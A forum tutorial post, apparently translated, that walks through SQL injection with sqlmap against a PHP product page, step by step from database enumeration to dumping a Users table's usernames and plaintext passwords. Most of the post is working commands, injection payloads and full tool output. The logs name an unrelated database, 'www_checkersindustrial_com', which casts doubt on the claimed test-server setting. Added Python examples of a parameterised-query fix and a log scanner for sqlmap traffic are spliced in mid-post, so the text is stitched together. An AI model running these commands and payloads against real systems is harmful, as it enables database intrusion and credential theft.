
#1 18-07-2014 18:41:04

IceF0x
#! Linux Guru

[Tutorial] Example of SQL exploitation with SQLmap on BackTrack 5 R1

== Overview ==

Here is an example of SQL exploitation using the SQLmap application.

SQLmap is installed by default on BackTrack 5 R1, but I am including the installation tutorial in case you want to try it on another Linux distribution or update it.
Note from Inazo: a major drawback of these tools is the amount of traces generated by the test requests; even if the attack can be simple with sqlmap, it is better to do it by hand.

== Installation ==

It is very simple: since it is written in Python, there is nothing to compile.

http://sourceforge.net/projects/sqlmap/files/sqlmap/0.9/sqlmap-0.9.tar.gz/d…

Extract the archive.

tar -xzvf sqlmap-0.9.tar.gz
mv sqlmap-0.9 /pentest/database/sqlmap/   # source directory added; the name of the extracted directory is assumed to match the archive

== Usage ==

Go to the sqlmap directory

cd /pentest/database/sqlmap/

And launch the attack on the site being pentested.

python sqlmap.py -u http://www.sitetest.com/product.php?id=54 --dbs

Wait, and when the [Y/N] question comes up at some point, answer N.

$ python sqlmap.py -u http://www.sitetest.com/product.php?id=54 --dbs

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 11:19:54

[11:19:54] [INFO] using '/home/user/sqlmap/output/www.sitetest.com/session' as session file
[11:19:54] [INFO] testing connection to the target url
[11:19:56] [INFO] testing if the url is stable, wait a few seconds
[11:19:57] [INFO] url is stable
[11:19:57] [INFO] testing if GET parameter 'id' is dynamic
[11:19:58] [INFO] confirming that GET parameter 'id' is dynamic
[11:19:59] [INFO] GET parameter 'id' is dynamic
[11:19:59] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[11:19:59] [INFO] testing sql injection on GET parameter 'id'
[11:19:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:20:02] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[11:20:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[11:20:08] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable 
[11:20:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:20:08] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:21:09] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable 
[11:21:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[11:21:39] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[11:22:10] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[11:22:41] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[11:22:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] n
sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=54 AND 5486=5486

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=54 AND (SELECT 6970 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,104,102,58),(SELECT (CASE WHEN (6970=6970) THEN 1 ELSE 0 END)),CHAR(58,112,120,102,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=54 AND SLEEP(5)
---

[11:23:03] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: PHP 5.3.3, Apache 2.2.17
back-end DBMS: MySQL 5.0
[11:23:03] [INFO] fetching database names
[11:23:04] [INFO] the SQL query used returns 5 entries
[11:23:04] [INFO] retrieved: information_schema
[11:23:04] [INFO] retrieved: www_choseprentals_com
[11:23:05] [INFO] retrieved: www_chose_com
[11:23:05] [INFO] retrieved: www_chose_com_working
[11:23:06] [INFO] retrieved: www_sitetest_com
available databases [5]:
[*] information_schema
[*] www_choserentals_com
[*] www_chose_com
[*] www_chose_com_working
[*] www_sitetest_com

[11:23:06] [INFO] Fetched data logged to text files under '/home/user/sqlmap/output/www.sitetest.com'

[*] shutting down at: 11:23:06

Let's look at the tables.

$ python sqlmap.py -u http://www.sitetest.com/product.php?id=54 -D www_sitetest_com --tables

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 11:26:59

[11:26:59] [INFO] using '/home/user/sqlmap/output/www.sitetest.com/session' as session file
[11:26:59] [INFO] resuming injection data from session file
[11:26:59] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:26:59] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=54 AND 5486=5486

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=54 AND (SELECT 6970 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,104,102,58),(SELECT (CASE WHEN (6970=6970) THEN 1 ELSE 0 END)),CHAR(58,112,120,102,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=54 AND SLEEP(5)
---

[11:27:00] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: PHP 5.3.3, Apache 2.2.17
back-end DBMS: MySQL 5.0
[11:27:00] [INFO] fetching tables for database 'www_sitetest_com'
[11:27:01] [INFO] the SQL query used returns 62 entries
[11:27:01] [INFO] retrieved: www_sitetest_com
[11:27:02] [INFO] retrieved: AssemblyInstructions
[11:27:02] [INFO] retrieved: www_sitetest_com
[11:27:03] [INFO] retrieved: BrandedList
[11:27:03] [INFO] retrieved: www_sitetest_com
[11:27:04] [INFO] retrieved: BrandedMapProducts
[11:27:04] [INFO] retrieved: www_sitetest_com
[11:27:05] [INFO] retrieved: CampaignHits
[11:27:05] [INFO] retrieved: www_sitetest_com
[11:27:06] [INFO] retrieved: CatMapProducts
[11:27:06] [INFO] retrieved: www_sitetest_com
[11:27:07] [INFO] retrieved: CatalogList
[11:27:07] [INFO] retrieved: www_sitetest_com
[11:27:08] [INFO] retrieved: Category
[11:27:08] [INFO] retrieved: www_sitetest_com
[11:27:09] [INFO] retrieved: CheckersMetrics
[11:27:09] [INFO] retrieved: www_sitetest_com
[11:27:10] [INFO] retrieved: Customers
[11:27:10] [INFO] retrieved: www_sitetest_com
[11:27:11] [INFO] retrieved: EJCustomers
[11:27:11] [INFO] retrieved: www_sitetest_com
[11:27:12] [INFO] retrieved: EJOrderItems
[11:27:12] [INFO] retrieved: www_sitetest_com
[11:27:13] [INFO] retrieved: EJOrders
[11:27:13] [INFO] retrieved: www_sitetest_com
[11:27:14] [INFO] retrieved: Email
[11:27:14] [INFO] retrieved: www_sitetest_com
[11:27:15] [INFO] retrieved: EmailList
[11:27:15] [INFO] retrieved: www_sitetest_com
[11:27:16] [INFO] retrieved: HomePagePics
[11:27:16] [INFO] retrieved: www_sitetest_com
[11:27:17] [INFO] retrieved: HomePageProducts
[11:27:17] [INFO] retrieved: www_sitetest_com
[11:27:18] [INFO] retrieved: HomePages
[11:27:18] [INFO] retrieved: www_sitetest_com
[11:27:19] [INFO] retrieved: LPBrandedList
[11:27:19] [INFO] retrieved: www_sitetest_com
[11:27:20] [INFO] retrieved: LPHomePages
[11:27:20] [INFO] retrieved: www_sitetest_com
[11:27:21] [INFO] retrieved: LPMetrics
[11:27:22] [INFO] retrieved: www_sitetest_com
[11:27:22] [INFO] retrieved: Model
[11:27:23] [INFO] retrieved: www_sitetest_com
[11:27:23] [INFO] retrieved: PageMetaData
[11:27:24] [INFO] retrieved: www_sitetest_com
[11:27:24] [INFO] retrieved: PhotoGallery
[11:27:25] [INFO] retrieved: www_sitetest_com
[11:27:25] [INFO] retrieved: PriceBook
[11:27:26] [INFO] retrieved: www_sitetest_com
[11:27:26] [INFO] retrieved: PriceBookLogos
[11:27:27] [INFO] retrieved: www_sitetest_com
[11:27:27] [INFO] retrieved: PriceBookMasterPriceList
[11:27:28] [INFO] retrieved: www_sitetest_com
[11:27:28] [INFO] retrieved: PriceBookPasswordRequest
[11:27:29] [INFO] retrieved: www_sitetest_com
[11:27:29] [INFO] retrieved: PriceBookProductGroups
[11:27:30] [INFO] retrieved: www_sitetest_com
[11:27:30] [INFO] retrieved: PriceBookReports
[11:27:31] [INFO] retrieved: www_sitetest_com
[11:27:31] [INFO] retrieved: PriceBookSpecialPriceList
[11:27:32] [INFO] retrieved: www_sitetest_com
[11:27:32] [INFO] retrieved: PriceBookUserMetrics
[11:27:33] [INFO] retrieved: www_sitetest_com
[11:27:33] [INFO] retrieved: PriceBookUsers
[11:27:34] [INFO] retrieved: www_sitetest_com
[11:27:34] [INFO] retrieved: ProductAccessoryPictures
[11:27:35] [INFO] retrieved: www_sitetest_com
[11:27:35] [INFO] retrieved: ProductFeatures
[11:27:36] [INFO] retrieved: www_sitetest_com
[11:27:36] [INFO] retrieved: ProductLoadCapacity
[11:27:36] [INFO] retrieved: www_sitetest_com
[11:27:37] [INFO] retrieved: ProductNewFeatures
[11:27:37] [INFO] retrieved: www_sitetest_com
[11:27:38] [INFO] retrieved: ProductNotes
[11:27:38] [INFO] retrieved: www_sitetest_com
[11:27:39] [INFO] retrieved: ProductPicturesByBrand
[11:27:39] [INFO] retrieved: www_sitetest_com
[11:27:40] [INFO] retrieved: ProductPicturesByCategory
[11:27:40] [INFO] retrieved: www_sitetest_com
[11:27:41] [INFO] retrieved: ProductRelatedModels
[11:27:41] [INFO] retrieved: www_sitetest_com
[11:27:42] [INFO] retrieved: ProductSpecifications
[11:27:42] [INFO] retrieved: www_sitetest_com
[11:27:43] [INFO] retrieved: ProductSymbols
[11:27:43] [INFO] retrieved: www_sitetest_com
[11:27:44] [INFO] retrieved: ProductWarnings
[11:27:44] [INFO] retrieved: www_sitetest_com
[11:27:45] [INFO] retrieved: Products
[11:27:45] [INFO] retrieved: www_sitetest_com
[11:27:46] [INFO] retrieved: ProductsMapModels
[11:27:46] [INFO] retrieved: www_sitetest_com
[11:27:47] [INFO] retrieved: RelatedLinks
[11:27:47] [INFO] retrieved: www_sitetest_com
[11:27:48] [INFO] retrieved: RentalCustomers
[11:27:48] [INFO] retrieved: www_sitetest_com
[11:27:49] [INFO] retrieved: RentalOrderDetails
[11:27:50] [INFO] retrieved: www_sitetest_com
[11:27:50] [INFO] retrieved: RentalOrders
[11:27:51] [INFO] retrieved: www_sitetest_com
[11:27:51] [INFO] retrieved: RentalUsers
[11:27:52] [INFO] retrieved: www_sitetest_com
[11:27:52] [INFO] retrieved: SiteParameters
[11:27:53] [INFO] retrieved: www_sitetest_com
[11:27:53] [INFO] retrieved: Transpage
[11:27:54] [INFO] retrieved: www_sitetest_com
[11:27:55] [INFO] retrieved: Users
[11:27:55] [INFO] retrieved: www_sitetest_com
[11:27:56] [INFO] retrieved: WebHeaders
[11:27:56] [INFO] retrieved: www_sitetest_com
[11:27:57] [INFO] retrieved: WebsiteBrands
[11:27:57] [INFO] retrieved: www_sitetest_com
[11:27:58] [INFO] retrieved: WebsiteCategory
[11:27:58] [INFO] retrieved: www_sitetest_com
[11:27:58] [INFO] retrieved: WebsiteContactInfo
[11:27:59] [INFO] retrieved: www_sitetest_com
[11:27:59] [INFO] retrieved: WebsiteModels
[11:28:00] [INFO] retrieved: www_sitetest_com
[11:28:00] [INFO] retrieved: WebsiteProducts
[11:28:01] [INFO] retrieved: www_sitetest_com
[11:28:01] [INFO] retrieved: Websites
[11:28:02] [INFO] retrieved: www_sitetest_com
[11:28:02] [INFO] retrieved: orderItems
[11:28:03] [INFO] retrieved: www_sitetest_com
[11:28:03] [INFO] retrieved: orders
Database: www_sitetest_com
[62 tables]
+---------------------------+
| AssemblyInstructions      |
| BrandedList               |
| BrandedMapProducts        |
| CampaignHits              |
| CatMapProducts            |
| CatalogList               |
| Category                  |
| CheckersMetrics           |
| Customers                 |
| EJCustomers               |
| EJOrderItems              |
| EJOrders                  |
| Email                     |
| EmailList                 |
| HomePagePics              |
| HomePageProducts          |
| HomePages                 |
| LPBrandedList             |
| LPHomePages               |
| LPMetrics                 |
| Model                     |
| PageMetaData              |
| PhotoGallery              |
| PriceBook                 |
| PriceBookLogos            |
| PriceBookMasterPriceList  |
| PriceBookPasswordRequest  |
| PriceBookProductGroups    |
| PriceBookReports          |
| PriceBookSpecialPriceList |
| PriceBookUserMetrics      |
| PriceBookUsers            |
| ProductAccessoryPictures  |
| ProductFeatures           |
| ProductLoadCapacity       |
| ProductNewFeatures        |
| ProductNotes              |
| ProductPicturesByBrand    |
| ProductPicturesByCategory |
| ProductRelatedModels      |
| ProductSpecifications     |
| ProductSymbols            |
| ProductWarnings           |
| Products                  |
| ProductsMapModels         |
| RelatedLinks              |
| RentalCustomers           |
| RentalOrderDetails        |
| RentalOrders              |
| RentalUsers               |
| SiteParameters            |
| Transpage                 |
| Users                     |
| WebHeaders                |
| WebsiteBrands             |
| WebsiteCategory           |
| WebsiteContactInfo        |
| WebsiteModels             |
| WebsiteProducts           |
| Websites                  |
| orderItems                |
| orders                    |
+---------------------------+

[11:28:03] [INFO] Fetched data logged to text files under '/home/user/sqlmap/output/www.sitetest.com'

[*] shutting down at: 11:28:03

For the example, we'll check the Users table.

$ python sqlmap.py -u http://www.sitetest.com/product.php?id=54 -D www_sitetest_com -T Users --columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 11:30:38

[11:30:38] [INFO] using '/home/user/sqlmap/output/www.sitetest.com/session' as session file
[11:30:38] [INFO] resuming injection data from session file
[11:30:38] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:30:38] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=54 AND 5486=5486

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=54 AND (SELECT 6970 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,104,102,58),(SELECT (CASE WHEN (6970=6970) THEN 1 ELSE 0 END)),CHAR(58,112,120,102,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=54 AND SLEEP(5)
---

[11:30:39] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: PHP 5.3.3, Apache 2.2.17
back-end DBMS: MySQL 5.0
[11:30:39] [INFO] fetching columns for table 'Users' on database 'www_sitetest_com'
[11:30:40] [INFO] the SQL query used returns 4 entries
[11:30:40] [INFO] retrieved: ID
[11:30:41] [INFO] retrieved: int(11)
[11:30:41] [INFO] retrieved: UserName
[11:30:42] [INFO] retrieved: varchar(255)
[11:30:42] [INFO] retrieved: Password
[11:30:43] [INFO] retrieved: varchar(255)
[11:30:43] [INFO] retrieved: Email
[11:30:44] [INFO] retrieved: varchar(255)
Database: www_sitetest_com
Table: Users
[4 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| Email    | varchar(255) |
| ID       | int(11)      |
| Password | varchar(255) |
| UserName | varchar(255) |
+----------+--------------+

[11:30:44] [INFO] Fetched data logged to text files under '/home/user/sqlmap/output/www.sitetest.com'

[*] shutting down at: 11:30:44

We'll do a simple test on the ID column, just to see :) and to keep the suspense ;)

$ python sqlmap.py -u http://www.sitetest.com/product.php?id=54 -D www_sitetest_com -T Users -C ID --dump

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 11:32:36

[11:32:37] [INFO] using '/home/user/sqlmap/output/www.sitetest.com/session' as session file
[11:32:37] [INFO] resuming injection data from session file
[11:32:37] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:32:37] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=54 AND 5486=5486

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=54 AND (SELECT 6970 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,104,102,58),(SELECT (CASE WHEN (6970=6970) THEN 1 ELSE 0 END)),CHAR(58,112,120,102,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=54 AND SLEEP(5)
---

[11:32:38] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: PHP 5.3.3, Apache 2.2.17
back-end DBMS: MySQL 5.0
[11:32:38] [INFO] fetching columns 'ID' entries for table 'Users' on database 'www_checkersindustrial_com'
[11:32:38] [INFO] the SQL query used returns 3 entries
[11:32:39] [INFO] retrieved: 1
[11:32:39] [INFO] retrieved: 2
[11:32:40] [INFO] retrieved: 3
Database: www_sitetest_com
Table: Users
[3 entries]
+----+
| ID |
+----+
| 1  |
| 2  |
| 3  |
+----+

[11:32:40] [INFO] Table 'www_sitetest_com.Users' dumped to CSV file '/home/user/sqlmap/output/www.sitetest.com/dump/www_sitetest_com/Users.csv'
[11:32:40] [INFO] Fetched data logged to text files under '/home/user/sqlmap/output/www.sitetest.com'

[*] shutting down at: 11:32:40

We see that the user identifiers are 1, 2 and 3; these numbers have a meaning, but we won't deal with that now.

$ python sqlmap.py -u http://www.sitetest.com/product.php?id=54 -D www_sitetest_com -T Users -C Password --dump

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 11:34:50

[11:34:51] [INFO] using '/home/user/sqlmap/output/www.sitetest.com/session' as session file
[11:34:51] [INFO] resuming injection data from session file
[11:34:51] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:34:51] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=54 AND 5486=5486

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=54 AND (SELECT 6970 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,104,102,58),(SELECT (CASE WHEN (6970=6970) THEN 1 ELSE 0 END)),CHAR(58,112,120,102,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=54 AND SLEEP(5)
---

[11:34:52] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: PHP 5.3.3, Apache 2.2.17
back-end DBMS: MySQL 5.0
[11:34:52] [INFO] fetching columns 'Password' entries for table 'Users' on database 'www_checkersindustrial_com'
[11:34:52] [INFO] read from file '/home/user/sqlmap/output/www.sitetest.com/session': 3
[11:34:52] [INFO] the SQL query used returns 3 entries
[11:34:53] [INFO] retrieved: grissom
[11:34:54] [INFO] retrieved: robbi
[11:34:54] [INFO] retrieved: cab!lost
Database: www_sitetest_com
Table: Users
[3 entries]
+----------+
| Password |
+----------+
| grissom  |
| robbi    |
| cab!lost |
+----------+

[11:34:54] [INFO] Table 'www_sitetest_com.Users' dumped to CSV file '/home/user/sqlmap/output/www.sitetest.com/dump/www_sitetest_com/Users.csv'
[11:34:54] [INFO] Fetched data logged to text files under '/home/user/sqlmap/output/www.sitetest.com'

[*] shutting down at: 11:34:54

Here we see that the password of user 1 is grissom.

Let's move on to the user names.

$ python sqlmap.py -u http://www.sitetest.com/product.php?id=54 -D www_sitetest_com -T Users -C UserName --dump

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 11:40:23

[11:40:24] [INFO] using '/home/user/sqlmap/output/www.sitetest.com/session' as session file
[11:40:24] [INFO] resuming injection data from session file
[11:40:24] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:40:24] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=54 AND 5486=5486

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=54 AND (SELECT 6970 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,104,102,58),(SELECT (CASE WHEN (6970=6970) THEN 1 ELSE 0 END)),CHAR(58,112,120,102,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=54 AND SLEEP(5)
---

[11:40:25] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: PHP 5.3.3, Apache 2.2.17
back-end DBMS: MySQL 5.0
[11:40:25] [INFO] fetching columns 'UserName' entries for table 'Users' on database 'www_checkersindustrial_com'
[11:40:25] [INFO] read from file '/home/user/sqlmap/output/www.sitetest.com/session': 3
[11:40:25] [INFO] the SQL query used returns 3 entries
[11:40:25] [INFO] retrieved: bryan
[11:40:26] [INFO] retrieved: robbi
[11:40:26] [INFO] retrieved: jesica
Database: www_sitetest_com
Table: Users
[3 entries]
+----------+
| UserName |
+----------+
| bryan    |
| robbi    |
| jesica   |
+----------+

[11:40:26] [INFO] Table 'www_sitetest_com.Users' dumped to CSV file '/home/user/sqlmap/output/www.sitetest.com/dump/www_sitetest_com/Users.csv'
[11:40:26] [INFO] Fetched data logged to text files under '/home/user/sqlmap/output/www.sitetest.com'

[*] shutting down at: 11:40:26

And there we have it: UserName: bryan, Password: grissom.

I should point out that I did not use SQLmap under real conditions, but on a vulnerable site installed for the test on a server dedicated to testing.
Any use of this software for purposes other than testing, on a site that does not belong to you, is punishable under the laws in force in your country.


Using proprietary software is like eating ready meals: you cannot tell what preservatives they contain, people will always say it is good, but it will never replace a home-cooked meal made by your mom.
]:D #! Crunchbang & Archlinux GNU/Linux User ]:D
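As an added example (not code from this post, from the test site, or from sqlmap): the post never shows the PHP behind product.php, so the vulnerable handler below is an assumption about how such a page is typically written, with the id pasted straight into the SQL string. It replays the boolean-based blind payload sqlmap reported above (id=54 AND 5486=5486, and its false twin) against that handler and against a version that type-checks the value and binds it as a parameter, using an in-memory SQLite Products table in place of the MySQL backend. The function names, table contents and product names are constructed for the example.

```python
"""Why an endpoint like product.php?id=54 is injectable, and what closes the hole.

Added example, not code from the original post or from sqlmap. The post
never shows the PHP behind product.php, so product_vulnerable() is an
assumption about how such endpoints are usually written (the id pasted
into the SQL string). An in-memory SQLite database with a constructed
Products table stands in for the MySQL backend of the post; the boolean
payloads are the ones sqlmap reported on the page (id=54 AND 5486=5486).
"""
import sqlite3


def setup_db():
    """Constructed sample data: a small Products table with a row for id 54."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Products (ID INTEGER PRIMARY KEY, Name TEXT NOT NULL)")
    conn.executemany(
        "INSERT INTO Products (ID, Name) VALUES (?, ?)",
        [(53, "Wheel chock"), (54, "Cable ramp"), (55, "Ladder")],
    )
    conn.commit()
    return conn


def product_vulnerable(conn, raw_id):
    """Assumed shape of the original product.php: the raw GET parameter is
    concatenated into the statement, so anything after the number becomes SQL."""
    sql = "SELECT Name FROM Products WHERE ID = " + raw_id
    return [row[0] for row in conn.execute(sql)]


def product_hardened(conn, raw_id):
    """Same lookup with the value type-checked and bound as a parameter.

    The database receives the query text and the value separately, so the
    value can never be parsed as SQL; rejecting non-integers up front also
    gives the application a clean 400 instead of a database error."""
    try:
        product_id = int(raw_id)
    except ValueError:
        return []  # a real handler would answer HTTP 400 here
    cur = conn.execute("SELECT Name FROM Products WHERE ID = ?", (product_id,))
    return [row[0] for row in cur]


def boolean_oracle_leaks(handler, conn):
    """Replays the boolean-based blind check from the page: a true condition
    (5486=5486) and a false one (5486=5487) appended to a valid id. If the
    two responses differ, the handler is a yes/no oracle that sqlmap can use
    to read the database one bit at a time."""
    true_case = handler(conn, "54 AND 5486=5486")
    false_case = handler(conn, "54 AND 5486=5487")
    return true_case != false_case


if __name__ == "__main__":
    db = setup_db()
    for name, handler in (("vulnerable", product_vulnerable), ("hardened", product_hardened)):
        print(f"{name}: normal lookup -> {handler(db, '54')}, "
              f"boolean oracle leaks -> {boolean_oracle_leaks(handler, db)}")
```

The time-based (SLEEP(5)) and error-based (information_schema / FLOOR(RAND(0)*2)) payloads from the page are MySQL-specific and cannot be replayed against SQLite, but they exploit the same root cause: the value was part of the statement text. With the value bound as a parameter, all three techniques fail the same way, because the database never parses it.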
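Inazo's note above mentions the amount of traces these tools leave. As an added example (not code from the post or from sqlmap), here is what those traces look like from the defender's side: a small Python scanner over constructed Apache combined-format log lines that flags sqlmap's default User-Agent (assumed to start with "sqlmap/"; a run with --random-agent or --user-agent would not show it) and the payload shapes from the injection points listed above (boolean-based AND n=n, SLEEP(), information_schema / FLOOR(RAND()), UNION ... SELECT), then counts flagged requests per source address. The log lines, IP addresses and function names are constructed for the example.

```python
"""Spotting sqlmap's footprint in a web server access log.

Added example, not code from the post or from sqlmap. The log lines are
constructed in Apache combined format (IPs from the documentation ranges,
timestamps chosen to match the post's session) and the payload signatures
are derived from the injection points sqlmap reported on the page. The
'sqlmap/' user-agent check assumes the tool's default User-Agent header;
a tester who overrides it is only caught by the payload signatures and
the request volume.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Apache combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Signatures matched against each URL-decoded query parameter value.
# Labels follow the injection types sqlmap printed on the page.
PAYLOAD_SIGNATURES = [
    ("boolean-based blind", re.compile(r"\b(?:AND|OR)\s+\d+\s*=\s*\d+", re.I)),
    ("time-based blind", re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I)),
    ("error-based", re.compile(r"information_schema|FLOOR\s*\(\s*RAND\s*\(", re.I)),
    ("union-based", re.compile(r"\bUNION\b.*\bSELECT\b", re.I)),
]

# Constructed sample: one sqlmap run against product.php, one ordinary visitor,
# and one probe with a browser user-agent that only the payload check catches.
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Jul/2014:11:19:54 +0200] "GET /product.php?id=54 HTTP/1.1" 200 5120 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"',
    '203.0.113.7 - - [18/Jul/2014:11:20:02 +0200] "GET /product.php?id=54%20AND%205486%3D5486 HTTP/1.1" 200 5120 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"',
    '203.0.113.7 - - [18/Jul/2014:11:20:08 +0200] "GET /product.php?id=54%20AND%20(SELECT%20COUNT(*)%20FROM%20information_schema.tables%20GROUP%20BY%20FLOOR(RAND(0)*2)) HTTP/1.1" 500 812 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"',
    '203.0.113.7 - - [18/Jul/2014:11:21:09 +0200] "GET /product.php?id=54%20AND%20SLEEP(5) HTTP/1.1" 200 5120 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"',
    '198.51.100.20 - - [18/Jul/2014:11:21:15 +0200] "GET /product.php?id=55 HTTP/1.1" 200 4870 "http://www.sitetest.com/" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.0.2.33 - - [18/Jul/2014:11:21:30 +0200] "GET /product.php?id=55%20AND%20SLEEP(5) HTTP/1.1" 200 4870 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def inspect_request(entry):
    """List the reasons one parsed request looks like sqlmap traffic (empty if none)."""
    reasons = []
    if entry["ua"].lower().startswith("sqlmap/"):
        reasons.append("sqlmap user-agent")
    # parse_qsl percent-decodes the values, so the signatures see plain SQL.
    query = urlsplit(entry["target"]).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        for label, pattern in PAYLOAD_SIGNATURES:
            if pattern.search(value):
                reasons.append(f"{label} payload in '{name}'")
    return reasons


def scan(lines):
    """Return (ip, target, reasons) for every line that trips at least one check."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = inspect_request(entry)
        if reasons:
            findings.append((entry["ip"], entry["target"], reasons))
    return findings


def noisy_sources(findings, threshold=3):
    """IPs with at least `threshold` flagged requests: the 29 requests of the
    post's first run all came from one client within a few minutes."""
    counts = Counter(ip for ip, _, _ in findings)
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for ip, target, reasons in hits:
        print(ip, target[:60], reasons)
    print("noisy sources:", noisy_sources(hits))
```

The payload regexes will also fire on legitimate input that happens to contain those keywords, so treat a single hit as something to triage rather than block automatically; the per-source count is what exposes a run that hides behind a browser user-agent, since every technique sqlmap tried on the page needed many requests to the same parameter from the same client.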

#2 01-01-2016 11:02:07

IceF0x
#! Linux Guru

Re: [Tutorial] Example of SQL exploitation with SQLmap on BackTrack 5 R1